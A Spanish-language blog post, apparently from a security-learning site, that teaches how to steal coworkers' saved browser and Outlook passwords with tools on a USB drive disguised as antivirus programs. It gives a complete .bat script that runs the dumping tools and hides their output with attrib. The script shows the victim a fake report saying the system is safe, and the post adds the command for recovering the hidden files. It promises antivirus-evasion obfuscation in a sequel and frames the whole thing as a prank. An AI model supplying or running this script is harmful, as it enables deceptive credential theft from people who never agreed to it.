This page looks best with JavaScript enabled

Divirtiéndonos con un USB - Primera Parte

 ·   ·   3 min read

¡ Buenas tardes compañeros ! 

A fin de éste año tengo la idea (ya casi confirmada) de rendir mi primera certificación de Seguridad Informática, en fin, la certificación CEH.

Leyendo una de las teorías, si mal no recuerdo era el capítulo de Malware, encontré ciertas herramientas para divertirnos con alguna PC de nuestros compañeros. Solo necesitaremos un USB y las herramientas que subí a este enlace, las cuales son las siguientes:

 - Firefox-AV
 - IE-AV

 - Mail-AV

Éstas herramientas se encargan de buscar información que queda almacenada en nuestro navegador o en alguna cuenta asociada a nuestro correo electrónico (Outlook en éste caso) y nos revelarán sus contraseñas. En sí, es un proceso algo más largo pero no nos vamos a meter en detalles y vamos a disfrutar de las herramientas !

Una vez que los hayamos descargado, podemos ejecutarlos y ver su potencial. (Voy a tratar de buscar alguna herramienta que pueda recuperar la información de Chrome y luego actualizaré el post)

Pero si realmente queremos divertirnos un poco con algunos compañeros algo despistados, podemos hacerle creer que son AntiVirus (por eso el AV como sufijo) para nuestras aplicaciones del ordenador (Total, todo el mundo descarga AV’s falsos .. y .. quien desconfiaría de un hacker ahora ?)

Crearemos un simple script .bat con el siguiente fragmento:

@echo off  
cls  
echo "Generando un reporte del sistema, por favor aguarde ..."  
start MAIL-AV.exe /stext MAIL.txt  
start IE-AV.exe /stext IE.txt  
start FIREFOX-AV.exe /stext FIREFOX.txt  
timeout /t 5  
cls  
echo "Finalizacion de registro de la memoria, por favor revise el archivo Resultados.txt \\n \\n"  
echo Estas completamente a salvo en tu sistema > Resultados.txt  
pause  
attrib +r +h +s FIREFOX.txt  
attrib +r +h +s IE.txt  
attrib +r +h +s MAIL.txt  
exit

Al cual llamaremos Launcher-AV.bat o como quieran.

Al ejecutarlo, guardaremos los resultados de nuestras herramientas en diferentes archivos de texto, para luego ocultarlos y quedarnos con esos datos (Tranquilos, todo está en el script). Al usuario solo le mostraremos un falso Resultados.txt.

Para luego poder recuperar los archivos ocultos pueden usar el siguiente comando:

attrib -r -h -s /s /d

 Como recomendaciones, les digo que traten de que el usuario ejecute estas herramientas dentro del Pendrive, para poder ya tener la información oculta en el mismo.

Espero que se diviertan .. pero CON CUIDADO !

Antes de finalizar, quisiera disculparme por mi mala programacion en .bat, hace mucho no tocaba este tema. 

Ah, y me olvidaba. En la segunda parte vamos a aprender a ofuscar el código anterior y tratar de utilizar técnicas de encoding para bypassear AV’s.

Por G.- de la Redacción de SniferL4bs.

Share on
Support the author with

Avatar
WRITTEN BY